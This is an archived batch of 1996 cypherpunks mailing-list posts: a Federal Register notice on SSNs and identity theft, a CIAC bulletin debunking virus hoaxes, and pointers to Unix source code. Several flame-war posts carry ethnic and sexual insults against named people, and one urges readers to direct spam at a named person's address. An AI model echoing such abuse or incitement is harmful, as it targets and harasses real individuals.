Date: Fri, 27 Dec 1996 08:07:35 -0800 (PST)
To: cypherpunks@toad.com
Subject: SSN_sii
Message-ID: <1.5.4.32.19961227160333.0068f5cc@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


[Thanks to RF.]

Federal Register: December 26, 1996 [Pages 68044-68045]:

The Federal Reserve Board solicits comment concerning the public 
availability and use of social security numbers and other sensitive 
identifying information about consumers.

The FRB, and the FTC, is to conduct a study to determine the 
availability to the public of sensitive identifying information about 
consumers, the possibility that such  information could be used for 
financial fraud, and the potential for fraud or risk of loss, if any, 
to insured depository institutions.

Testimony at a recent FTC hearing highlighted how easy it is to obtain
identifying information about a consumer and to use that information to
fraudulently receive credit in the consumer's name, a practice often 
referred to as "identity theft."

-----

SSN_ssi  (9 kb)

Or, access the Federal Register at:

http://www.access.gpo.gov/su_docs/aces/aces140.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 27 Dec 1996 08:30:29 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Fyodor / Re: SPAM from plaidworks.com
In-Reply-To: <32C3DC4F.BD3@sk.sympatico.ca>
Message-ID: <g0RLZD129w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Toto <toto@sk.sympatico.ca> writes:

> Fyodor Yarochkin wrote:
> >
> > what  the f$%^#$$# shit.. I can not get?.. did some Crazy Idiot >subscirbed
> >  anyone can explain me wuzzup?
>
> Fyodor,
>  The webmaster and postmaster at plaidworks.com are lonely and
> want you to send them eMail.

They're innocent people being framed by the SDPA terrorist.
Please forward all unsolicited spam to <ray@earthweb.com>.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 27 Dec 1996 08:40:39 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: (Fwd) Re: Bad Idea
In-Reply-To: <32C3E828.608B@sk.sympatico.ca>
Message-ID: <8FsLZD130w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Toto <toto@sk.sympatico.ca> writes:

> Adam Breaux wrote:
> > As far as I can tell, cypherpunks wasn't subscribed to anything. What
> > happened instead was someone started forging email in the name of the
> > list's submission address to various of my mailbots, which simply send
> > an informational e-mail back.
>
>   If cypherpunks wasn't subscribed to anything, then why did I get
> 50 million messages about sports in my mailbox?

Because Ray Arachelian <ray@earthweb.com> is an inept forger and a liar.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@ctrl-alt-del.com>
Date: Fri, 27 Dec 1996 11:39:30 -0800 (PST)
To: jlucas4@capital.edu (Jesse Lucas)
Subject: Re: UNIX talk and write source...
Message-ID: <3.0.1.32.19961227113321.014c3630@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:17 PM 12/26/96 -0500, Jesse Lucas wrote:
>
>Fellows,
>
>   Anyone know if and where the source code for UNIX talk and write (or the 
>equivalent Linux) commands are to be found?  Anyone have any terminal to 
>terminal communication code that they've written that they wouldn't mind
>parting with?  

Check out http://www.gnu.org/ . They have source for all sorts of fun
stuff.  What you are looking for is in their "inetutils" package.  (Or in
BSD44.  It is listed twice.)  You also might check out some of the larger
source mirrors for Linux, like ftp.cdrom.com.
 
---
|        "Spam is the Devil's toothpaste!" - stuart@teleport.com         |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.ctrl-alt-del.com/~alan/       |alan@ctrl-alt-del.com|




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bob Antia <antia@leftbank.com>
Date: Fri, 27 Dec 1996 13:03:09 -0800 (PST)
To: dcsb@ai.mit.edu
Subject: Re: "Deeyenda" E-MAil virus alert!!!!!!
Message-ID: <199612271654.LAA21263@zax.leftbank.com>
MIME-Version: 1.0
Content-Type: text/plain



I will not go into a rant about the technical impossibilities of such 
a virus, I'll just forward this pice of information on, hoping that
it will get read and filed, to be used as future reference.

This is a hoax. These hoaxes are becoming so prevalent that the CIAC 
put out a bulletin about such hoaxes. Here is the bulletin:


             __________________________________________________________

                       The U.S. Department of Energy
                    Computer Incident Advisory Capability
                           ___  __ __    _     ___
                          /       |     /_\   /
                          \___  __|__  /   \  \___
             __________________________________________________________

                             INFORMATION BULLETIN

            Internet Hoaxes: PKZ300, Irina, Good Times, Deeyenda, Ghost

November 20, 1996 15:00 GMT                                        Number H-05
______________________________________________________________________________
PROBLEM:       This bulletin addresses the following hoaxes and erroneous 
               warnings: PKZ300 Warning, Irina, Good Times, Deeyenda, and 
               Ghost.exe
PLATFORM:      All, via e-mail
DAMAGE:        Time lost reading and responding to the messages
SOLUTION:      Pass unvalidated warnings only to your computer security 
               department or incident response team. See below on how to 
               recognize validated and unvalidated warnings and hoaxes.
______________________________________________________________________________
VULNERABILITY  New hoaxes and warnings have appeared on the Internet and old 
ASSESSMENT:    hoaxes are still being cirulated.
______________________________________________________________________________


Introduction
============

The Internet is constantly being flooded with information about computer
viruses and Trojans. However, interspersed among real virus notices are 
computer virus hoaxes. While these hoaxes do not infect systems, they are 
still time consuming and costly to handle. At CIAC, we find that we are 
spending much more time de-bunking hoaxes than handling real virus incidents. 
This advisory addresses the most recent warnings that have appeared on the 
Internet and are being circulated throughout world today. We will also address
the history behind virus hoaxes, how to identify a hoax, and what to do if you
think a message is or is not a hoax. Users are requested to please not spread 
unconfirmed warnings about viruses and Trojans. If you receive an unvalidated 
warning, don't pass it to all your friends, pass it to your computer security 
manager to validate first. Validated warnings from the incident response teams
and antivirus vendors have valid return addresses and are usually PGP signed 
with the organization's key.

PKZ300 Warning
==============

The PKZ300 Trojan is a real Trojan program, but the initial warning about it 
was released over a year ago. For information pertaining to PKZ300 Trojan 
reference CIAC Notes issue 95-10, that was released in June of 1995.  

http://ciac.llnl.gov/ciac/notes/Notes10.shtml

The warning itself, on the other hand, is gaining urban legend status. There 
has been an extremely limited number of sightings of this Trojan and those 
appeared over a year ago. Even though the Trojan warning is real, the repeated 
circulation of the warning is a nuisance. Individuals who need the current 
release of  PKZIP should visit the PKWARE web page at http://www.pkware.com. 
CIAC recommends that you DO NOT recirculate the warning about this particular 
Trojan.           

Irina Virus Hoax
================

The "Irina" virus warnings are a hoax. The former head of an electronic 
publishing company circulated the warning to create publicity for a new 
interactive book by the same name. The publishing company has apologized for 
the publicity stunt that backfired and panicked Internet users worldwide. The 
original warning claimed to be from a Professor Edward Pridedaux of the 
College of Slavic Studies in London; there is no such person or college. 
However, London's School of  Slavonic and East European Studies has been 
inundated with calls. This poorly thought-out publicity stunt was highly 
irresponsible. For more information pertaining to this hoax, reference the 
UK Daily Telegraph at http://www.telegraph.co.uk.    

Good Times Virus Hoax
=====================

The "Good Times" virus warnings are a hoax. There is no virus by that name in 
existence today. These warnings have been circulating the Internet for years. 
The user community must become aware that it is unlikely that a virus can be 
constructed to behave in the manner ascribed in the "Good Times" virus 
warning. For more information related to this urban legend, reference CIAC 
Notes 95-09.

http://ciac.llnl.gov/ciac/notes/Notes09.shtml
    
Deeyenda Virus Hoax
===================

The "Deeyenda" virus warnings are a hoax. CIAC has received inqueries 
regarding the validity of the Deeyenda virus. The warnings are very similar 
to those for Good Times, stating that the FCC issued a warning about it, 
and that it is self activating and can destroy the contents of a machine 
just by being downloaded. Users should note that the FCC does not and will 
not issue virus or Trojan warnings. It is not their job to do so. As of this 
date, there are no known viruses with the name Deeyenda in existence. For a 
virus to spread, it  must be executed. Reading a mail message does not execute 
the mail message. Trojans and viruses have been found as executable attachments
to mail messages, but they must be extracted and executed to do any harm. CIAC
still affirms that reading E-mail, using typical mail agents, can not activate
malicious code delivered in or with the message.

Ghost.exe Warning
=================

The Ghost.exe program was originally distributed as a free screen saver 
containing some advertising information for the author's company (Access 
Softek). The program opens a window that shows a Halloween background with 
ghosts flying around the screen. On any Friday the 13th, the program window 
title changes and the ghosts fly off the window and around the screen. Someone
apparently got worried and sent a message indicating that this might be a 
Trojan. The warning grew until the it said that Ghost.exe was a Trojan that 
would destroy your hard drive and the developers got a lot of nasty phone 
calls (their names and phone numbers were in the About box of the program.) 
A simple phone call to the number listed in the program would have stopped 
this warning from being sent out. The original ghost.exe program is just cute;
it does not do anything damaging. Note that this does not mean that ghost 
could not be infected with a virus that does do damage, so the normal 
antivirus procedure of scanning it before running it should be followed.

History of Virus Hoaxes
=======================

Since 1988, computer virus hoaxes have been circulating the Internet. In 
October of that year, according to Ferbrache ("A pathology of Computer 
Viruses" Springer, London, 1992) one of the first virus hoaxes was the 
2400 baud modem virus: 

	SUBJ: Really Nasty Virus
 	AREA: GENERAL (1)
	
 	I've just discovered probably the world's worst computer virus 
 	yet. I had just finished a late night session of BBS'ing and file 
 	treading when I exited Telix 3 and attempted to run pkxarc to 
 	unarc the software I had downloaded. Next thing I knew my hard 
 	disk was seeking all over and it was apparently writing random 
 	sectors. Thank god for strong coffee and a recent backup. 
 	Everything was back to normal, so I called the BBS again and 
 	downloaded a file. When I went to use ddir to list the directory, 
 	my hard disk was getting trashed again. I tried Procomm Plus TD 
 	and also PC Talk 3. Same results every time. Something was up so I 
 	hooked up to my test equipment and different modems (I do research 
 	and development for a local computer telecommunications company 
 	and have an in-house lab at my disposal). After another hour of 
 	corrupted hard drives I found what I think is the world's worst 
 	computer virus yet. The virus distributes itself on the modem sub-
 	carrier present in all 2400 baud and up modems. The sub-carrier is 
 	used for ROM and register debugging purposes only, and otherwise 
 	serves no othr (sp) purpose. The virus sets a bit pattern in one 
 	of the internal modem registers, but it seemed to screw up the 
 	other registers on my USR. A modem that has been "infected" with 
 	this virus will then transmit the virus to other modems that use a 
 	subcarrier (I suppose those who use 300 and 1200 baud modems 
 	should be immune). The virus then attaches itself to all binary 
 	incoming data and infects the host computer's hard disk. The only 
 	way to get rid of this virus is to completely reset all the modem 
 	registers by hand, but I haven't found a way to vaccinate a modem 
 	against the virus, but there is the possibility of building a 
 	subcarrier filter. I am calling on a 1200 baud modem to enter this 
 	message, and have advised the sysops of the two other boards 
 	(names withheld). I don't know how this virus originated, but I'm 
 	sure it is the work of someone in the computer telecommunications 
 	field such as myself. Probably the best thing to do now is to 
 	stick to 1200 baud until we figure this thing out.

	Mike RoChenle

This bogus virus description spawned a humorous alert by Robert Morris III :

 	Date: 11-31-88 (24:60)	Number: 32769
 	To: ALL	Refer#: NONE
 	From: ROBERT MORRIS III	Read: (N/A)
 	Subj: VIRUS ALERT	Status: PUBLIC MESSAGE
 	
 	Warning: There's a new virus on the loose that's worse than 
 	anything I've seen before! It gets in through the power line, 
 	riding on the powerline 60 Hz subcarrier. It works by changing the 
 	serial port pinouts, and by reversing the direction one's disks 
 	spin. Over 300,000 systems have been hit by it here in Murphy, 
 	West Dakota alone! And that's just in the last 12 minutes.
 	
	It attacks DOS, Unix, TOPS-20, Apple-II, VMS, MVS, Multics, Mac, 
 	RSX-11, ITS, TRS-80, and VHS systems.
 	
 	To prevent the spresd of the worm:
 	
 	1) Don't use the powerline.
 	2) Don't use batteries either, since there are rumors that this 
 	  virus has invaded most major battery plants and is infecting the 
 	  positive poles of the batteries. (You might try hooking up just 
 	  the negative pole.)
 	3) Don't upload or download files.
 	4) Don't store files on floppy disks or hard disks.
 	5) Don't read messages. Not even this one!
 	6) Don't use serial ports, modems, or phone lines.
 	7) Don't use keyboards, screens, or printers.
 	8) Don't use switches, CPUs, memories, microprocessors, or 
 	  mainframes.
 	9) Don't use electric lights, electric or gas heat or 
 	  airconditioning, running water, writing, fire, clothing or the 
 	  wheel.
 	
 	I'm sure if we are all careful to follow these 9 easy steps, this 
 	virus can be eradicated, and the precious electronic flui9ds of 
 	our computers can be kept pure.
 	
 	---RTM III

Since that time virus hoaxes have flooded the Internet.With thousands of 
viruses worldwide, virus paranoia in the community has risen to an extremely 
high level. It is this paranoia that fuels virus hoaxes. A good example of 
this behavior is the "Good Times" virus hoax which started in 1994 and is 
still circulating the Internet today. Instead of spreading from one computer 
to another by itself, Good Times relies on people to pass it along. 

How to Identify a Hoax
======================

There are several methods to identify virus hoaxes, but first consider what 
makes a successful hoax on the Internet. There are two known factors that make
a successful virus hoax, they are: (1) technical sounding language, and 
(2) credibility by association. If the warning uses the proper technical 
jargon, most individuals, including technologically savy individuals, tend to 
believe the warning is real. For example, the Good Times hoax says that 
"...if the program is not stopped, the computer's processor will be placed in 
an nth-complexity infinite binary loop which can severely damage the 
processor...". The first time you read this, it sounds like it might be 
something real. With a little research, you find that there is no such thing 
as an nth-complexity infinite binary loop and that processors are designed 
to run loops for weeks at a time without damage.

When we say credibility by association we are referring to whom sent the 
warning. If the janitor at a large technological organization sends a warning
to someone outside of that organization, people on the outside tend to believe
the warning because the company should know about those things. Even though 
the person sending the warning may not have a clue what he is talking about, 
the prestigue of the company backs the warning, making it appear real. If a 
manager at the company sends the warning, the message is doubly backed by the
company's and the manager's reputations. 

Individuals should also be especially alert if the warning urges you to pass 
it on to your friends. This should raise a red flag that the warning may be 
a hoax. Another flag to watch for is when the warning indicates that it is a 
Federal Communication Commission (FCC) warning. According to the FCC, they 
have not and never will disseminate warnings on viruses. It is not part of 
their job. 

CIAC recommends that you DO NOT circulate virus warnings without first 
checking with an authoritative source. Authoritative sources are your computer
system security administrator or a computer incident advisory team. Real 
warnings about viruses and other network problems are issued by different 
response teams (CIAC, CERT, ASSIST, NASIRC, etc.) and are digitally signed by 
the sending team using PGP. If you download a warning from a teams web site or
validate the PGP signature, you can usually be assured that the warning is 
real. Warnings without the name of the person sending the original notice, or 
warnings with names, addresses and phone numbers that do not actually exist 
are probably hoaxes.

What to Do When You Receive a Warning
=====================================
 
Upon receiving a warning, you should examine its PGP signature to see that it 
is from a real response team or antivirus organization. To do so, you will
need a copy of the PGP software and the public signature of the team that
sent the message. The CIAC signature is available from the CIAC web server 
at:

http://ciac.llnl.gov 

If there is no PGP signature, see if the warning includes the name of the 
person submitting the original warning. Contact that person to see if he/she
really wrote the warning and if he/she really touched the virus. If he/she is 
passing on a rumor or if the address of the person does not exist or if 
there is any questions about theauthenticity or the warning, do not circulate 
it to others. Instead, send the warning to your computer security manager or 
incident response team and let them validate it. When in doubt, do not send
it out to the world. Your computer security managers and the incident response
teams teams have experts who try to stay current on viruses and their warnings.
In addition, most anti-virus companies have a web page containing information 
about most known viruses and hoaxes. You can also call or check the web site 
of the company that produces the product that is supposed to contain the virus.
Checking the PKWARE site for the current releases of PKZip would stop the 
circulation of the warning about PKZ300 since there is no released version 3 
of PKZip. Another useful web site is the "Computer Virus Myths home page" 
(http://www.kumite.com/myths/) which contains descriptions of several known 
hoaxes. In most cases, common sense would eliminate Internet hoaxes.

- -----------------------------------------------------------------------------

CIAC, the Computer Incident Advisory Capability, is the computer
security incident response team for the U.S. Department of Energy
(DOE) and the emergency backup response team for the National
Institutes of Health (NIH). CIAC is located at the Lawrence Livermore
National Laboratory in Livermore, California. CIAC is also a founding
member of FIRST, the Forum of Incident Response and Security Teams, a
global organization established to foster cooperation and coordination
among computer security teams worldwide.

CIAC services are available to DOE, DOE contractors, and the NIH. CIAC
can be contacted at:
    Voice:    +1 510-422-8193
    FAX:      +1 510-423-8002
    STU-III:  +1 510-423-2604
    E-mail:   ciac@llnl.gov

For emergencies and off-hour assistance, DOE, DOE contractor sites,
and the NIH may contact CIAC 24-hours a day. During off hours (5PM -
8AM PST), call the CIAC voice number 510-422-8193 and leave a message,
or call 800-759-7243 (800-SKY-PAGE) to send a Sky Page. CIAC has two
Sky Page PIN numbers, the primary PIN number, 8550070, is for the CIAC
duty person, and the secondary PIN number, 8550074 is for the CIAC
Project Leader.

Previous CIAC notices, anti-virus software, and other information are
available from the CIAC Computer Security Archive.

   World Wide Web:      http://ciac.llnl.gov/
   Anonymous FTP:       ciac.llnl.gov (128.115.19.53)
   Modem access:        +1 (510) 423-4753 (28.8K baud)
                        +1 (510) 423-3331 (28.8K baud)

CIAC has several self-subscribing mailing lists for electronic
publications:
1. CIAC-BULLETIN for Advisories, highest priority - time critical
   information and Bulletins, important computer security information;
2. CIAC-NOTES for Notes, a collection of computer security articles;
3. SPI-ANNOUNCE for official news about Security Profile Inspector
   (SPI) software updates, new features, distribution and
   availability;
4. SPI-NOTES, for discussion of problems and solutions regarding the
   use of SPI products.

Our mailing lists are managed by a public domain software package
called ListProcessor, which ignores E-mail header subject lines. To
subscribe (add yourself) to one of our mailing lists, send the
following request as the E-mail message body, substituting
CIAC-BULLETIN, CIAC-NOTES, SPI-ANNOUNCE or SPI-NOTES for list-name and
valid information for LastName FirstName and PhoneNumber when sending

E-mail to       ciac-listproc@llnl.gov:
        subscribe list-name LastName, FirstName PhoneNumber
  e.g., subscribe ciac-notes OHara, Scarlett W. 404-555-1212 x36

You will receive an acknowledgment containing address, initial PIN,
and information on how to change either of them, cancel your
subscription, or get help.

PLEASE NOTE: Many users outside of the DOE, ESnet, and NIH computing
communities receive CIAC bulletins.  If you are not part of these
communities, please contact your agency's response team to report
incidents. Your agency's team will coordinate with CIAC. The Forum of
Incident Response and Security Teams (FIRST) is a world-wide
organization. A list of FIRST member organizations and their
constituencies can be obtained by sending email to
docserver@first.org with an empty subject line and a message body
containing the line: send first-contacts.

This document was prepared as an account of work sponsored by an
agency of the United States Government. Neither the United States
Government nor the University of California nor any of their
employees, makes any warranty, express or implied, or assumes any
legal liability or responsibility for the accuracy, completeness, or
usefulness of any information, apparatus, product, or process
disclosed, or represents that its use would not infringe privately
owned rights. Reference herein to any specific commercial products,
process, or service by trade name, trademark, manufacturer, or
otherwise, does not necessarily constitute or imply its endorsement,
recommendation or favoring by the United States Government or the
University of California. The views and opinions of authors expressed
herein do not necessarily state or reflect those of the United States
Government or the University of California, and shall not be used for
advertising or product endorsement purposes.

LAST 10 CIAC BULLETINS ISSUED (Previous bulletins available from CIAC)

G-43: Vulnerabilities in Sendmail
G-44: SCO Unix Vulnerability
G-45: Vulnerability in HP VUE
G-46: Vulnerabilities in Transarc DCE and DFS
G-47: Unix FLEXlm Vulnerabilities
G-48: TCP SYN Flooding and IP Spoofing Attacks
H-01: Vulnerabilities in bash
H-02: SUN's TCP SYN Flooding Solutions
H-03: HP-UX_suid_Vulnerabilities
H-04: HP-UX  Ping Vulnerability

RECENT CIAC NOTES ISSUED (Previous Notes available from CIAC)

Notes 07 - 3/29/95     A comprehensive review of SATAN

Notes 08 - 4/4/95      A Courtney update

Notes 09 - 4/24/95     More on the "Good Times" virus urban legend

Notes 10 - 6/16/95     PKZ300B Trojan, Logdaemon/FreeBSD, vulnerability
                       in S/Key, EBOLA Virus Hoax, and Caibua Virus

Notes 11 - 7/31/95     Virus Update, Hats Off to Administrators,
                       America On-Line Virus Scare, SPI 3.2.2 Released,
                       The Die_Hard Virus

Notes 12 - 9/12/95     Securely configuring Public Telnet Services, X
                       Windows, beta release of Merlin, Microsoft Word
                       Macro Viruses, Allegations of Inappropriate Data
                       Collection in Win95

Notes 96-01 - 3/18/96  Java and JavaScript Vulnerabilities, FIRST
                       Conference Announcement, Security and Web Search
                       Engines, Microsoft Word Macro Virus Update


-b

Bob Antia                                           antia@leftbank.com
The Left Bank Operation, Inc.                       http://www.leftbank.com
TCP/IP Internetworking                              LAN/WAN/NT/UNIX Admin
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
To unsubscribe from this list, send a letter to: Majordomo@ai.mit.edu
In the body of the message, write:  unsubscribe dcsb
Or, to subscribe,           write:  subscribe dcsb
If you have questions, write to me at Owner-DCSB@ai.mit.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Fri, 27 Dec 1996 09:25:57 -0800 (PST)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: Ray Arachelian's typical Armenian spam and sabotage
In-Reply-To: <kTXkZD121w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.961227122510.2156A-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 27 Dec 1996, Dr.Dimitri Vulis KOTM wrote:

> Someone should unsubscrive <crypto@uhf.wireless.net> -- apparently Ray's
> tentacle that sends whatever it receives back to "cypher punks" (spit).

#whois wireless.net
The Buaas Corporation (WIRELESS2-DOM)
   10044 Adams Ave. Suite 108
   Huntington Beach, CA 92646
   US

   Domain Name: WIRELESS.NET

   Administrative Contact, Technical Contact, Zone Contact, Billing Contact:
      Buaas, Robert A  (RAB4)  buaas@WIRELESS.NET
      714-968-0070 (FAX) +1-714-968-6781

   Record last updated on 11-Nov-96.
   Record created on 14-Jun-94.

   Domain servers in listed order:

   WIRELESS.WDC.NET             204.140.136.28
   NS1.KWIK.NET                 206.186.235.1


The InterNIC Registration Services Host contains ONLY Internet Information
(Networks, ASN's, Domains, and POC's).
Please use the whois server at nic.ddn.mil for MILNET Information.


Seeing how this is in California - it must be one of your friends Vulis, 
or one of your tentacles.  You've a long history of spamming the list 
with this type of sillyness.

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    | "If  you're  gonna die,  die  with your|./|\.
..\|/..|sunder@sundernet.com|boots on;  If you're  gonna  try,  just |/\|/\
<--*-->| ------------------ |stick around; Gonna cry? Just move along|\/|\/
../|\..| "A toast to Odin,  |you're gonna die, you're gonna die!"    |.\|/.
.+.v.+.|God of screwdrivers"|  --Iron Maiden "Die With Your Boots on"|.....
======================== http://www.sundernet.com =========================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Fri, 27 Dec 1996 09:28:44 -0800 (PST)
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: Fan mail from cocksucker John Gilmore and his friends
In-Reply-To: <DJDkZD114w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.961227122859.2156B-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


Vulis, you're repeating yourself, your last two spams showed up twice on 
each message.  Maybe your 2 bit gramaphone record player brain broke.

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    | "If  you're  gonna die,  die  with your|./|\.
..\|/..|sunder@sundernet.com|boots on;  If you're  gonna  try,  just |/\|/\
<--*-->| ------------------ |stick around; Gonna cry? Just move along|\/|\/
../|\..| "A toast to Odin,  |you're gonna die, you're gonna die!"    |.\|/.
.+.v.+.|God of screwdrivers"|  --Iron Maiden "Die With Your Boots on"|.....
======================== http://www.sundernet.com =========================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Fri, 27 Dec 1996 12:39:55 -0800 (PST)
To: cypherpunks@toad.com
Subject: OECD resolution?
Message-ID: <3.0.32.19961227124047.006a4fc8@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Now that the OECD meeting is over, does anybody have a final version of
their resolution? As opposed to the draft versions available on the net?

Thanks,


-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred
   Make your mark in the history of mathematics. Use the spare cycles of
   your PC/PPC/UNIX box to help find a new prime.
   http://www.mersenne.org/prime.htm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric "S." Johansson <esj@harvee.billerica.ma.us>
Date: Fri, 27 Dec 1996 13:06:07 -0800 (PST)
To: tpk@sensorsys.com
Subject: RE: "Deeyenda" E-MAil virus alert!!!!!!
Message-ID: <199612271751.MAA23997@harvee.billerica.ma.us>
MIME-Version: 1.0
Content-Type: text/plain


On 12/27/96 12:30 PM, tedk (tpk@sensorsys.com) writes 
> To:  ALL
>
>From: Ted Kochanski
>
>Re:  "Deeyenda"  E-MAIL Virus ALERT
>
>#: 2456 S0/CompuServe Mail  [MAIL]
>     20-Dec-96 20:23 EST
> Sb: Virus Alert
> Fm: Art Ellingsen > INTERNET:artell@ix.netcom.com
> To: Robert M. Avallone [70733,1707]

whoops, you been caught hook, line and urban legend  :-)  

check cert alerts for email viruses and how they are closely related to 
the loch ness monster

--- eric

Eric S. Johansson       ka1eec          esj@harvee.billerica.ma.us
This message was composed almost entirely by DragonDictate. 
k9 wisdom as translated by DD: "look homeward wrong aroma"

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
To unsubscribe from this list, send a letter to: Majordomo@ai.mit.edu
In the body of the message, write:  unsubscribe dcsb
Or, to subscribe,           write:  subscribe dcsb
If you have questions, write to me at Owner-DCSB@ai.mit.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Fri, 27 Dec 1996 09:59:57 -0800 (PST)
To: Fyodor Yarochkin <fygrave@freenet.bishkek.su>
Subject: Re: UNIX talk and write source...
In-Reply-To: <Pine.LNX.3.91.961227131547.14770N-100000@freenet.bishkek.su>
Message-ID: <Pine.LNX.3.95.961227125947.1066A-100000@gak.voicenet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 27 Dec 1996, Fyodor Yarochkin wrote:

> yes.. I met the same problem.. Itried to find out where is passwd and 
> login sources.. and as CD mark says, all the sources i could find on the cd..
>  but suddenly i didn't..:(
>  any advices?

Write and talk are part of BSD.  The source is at
unix.hensa.ac.uk/mirrors/FreeBSD/FreeBSD-current/src/usr.bin/ .

Mark

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQEVAwUBMsQPCSzIPc7jvyFpAQGw7AgAliExJXXCc7FbOeg8zVf5EK88rQ02N4e4
a+b38JT5OI7TfgyijCw7oZ2MB2pLOEAT3FaylyEAKDIkExCJK/Su3QVSfPA6HFM3
axhQks6u+5Yiyl4dxgIs8NkfJkQa1/8TdcrtCP8uDvHT6esnWvk78SAW/B3k80dT
0I/vNEqOZBrzBPcntijNh02AqkuQJRV2aNJsEpjf0BJ4SyFoqmnKwXCfSseuDzpl
oDxzp7yqg6UNwYwXObnyPBzz3ysK8CGuilFfGdORZpiS/R7hjRVJnnjp55eSGYLe
50Jjr/97N6Y74TMaFZJS0zJlBLwZWGvsLxVJD0y/K9Q0cRLO7106fQ==
=hJ0j
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Fyodor Yarochkin <fygrave@freenet.bishkek.su>
Date: Fri, 27 Dec 1996 00:11:17 -0800 (PST)
To: Jesse Lucas <jlucas4@capital.edu>
Subject: Re: UNIX talk and write source...
In-Reply-To: <9612270417.AA06960@gemini.capital.edu>
Message-ID: <Pine.LNX.3.91.961227131547.14770N-100000@freenet.bishkek.su>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 26 Dec 1996, Jesse Lucas wrote:
>    Anyone know if and where the source code for UNIX talk and write (or the 
> equivalent Linux) commands are to be found?  Anyone have any terminal to 
> terminal communication code that they've written that they wouldn't mind
> parting with?  
yes.. I met the same problem.. Itried to find out where is passwd and 
login sources.. and as CD mark says, all the sources i could find on the cd..
 but suddenly i didn't..:(
 any advices?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Fyodor Yarochkin <fygrave@freenet.bishkek.su>
Date: Fri, 27 Dec 1996 00:21:37 -0800 (PST)
Subject: Re: Error Condition Re: Invalid request
In-Reply-To: <199612262213.OAA02591@plaidworks.com>
Message-ID: <Pine.LNX.3.91.961227132549.14770W-100000@freenet.bishkek.su>
MIME-Version: 1.0
Content-Type: text/plain


what  the f$%^#$$# shit.. I can not get?.. did some Crazy Idiot subscirbed
cypherpunks to those Sport-Crappy lists?
 today morning i found a handred of stupid sport related ml..
 anyone can explain me wuzzup?

Thank you for your attention,...


On Thu, 26 Dec 1996 listproc@plaidworks.com wrote:

> Date: Thu, 26 Dec 1996 14:13:18 -0800
> From: listproc@plaidworks.com
> To: cypherpunks@toad.com
> Cc: list-errors@plaidworks.com
> Subject: Error Condition Re: Invalid request
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 27 Dec 1996 10:51:18 -0800 (PST)
To: cypherpunks@toad.com
Subject: CN Leads US
Message-ID: <1.5.4.32.19961227184644.006a36bc@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


12-27-96. WaPo snippet:

China said it plans to strengthen its already strict controls
over the Internet. The China Consumers Daily, an official
newspaper, mentioned the planned tighter controls in a
report on a recent conference in Beijing, but did not
provide details. Earlier this year, China required Internet
users to register with police and warned that laws
against pronography, social disturbances and breaches
of state security apply online.

[Whole story.]

-----

Sounds like US policy foretold, boiling the frog. The 
Administration's current CN policy must include a 
secret GAK-product sharing deal, to parallel those with
OECD and the world's big-bit-fearful.

Behold the burgeoning, slobbering, Key Recovery 
Alliance: billions of targets to be tracked, keys shared
with authorities who give out the contracts, profits 
ka-chinged (low pun).

Gerstner says he can't believe the money IBM's going 
to make off sweet deals to control the Internet -- just
like the old days before the anarchistic start-ups got 
uppity and out-foxed the old-money-archists.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
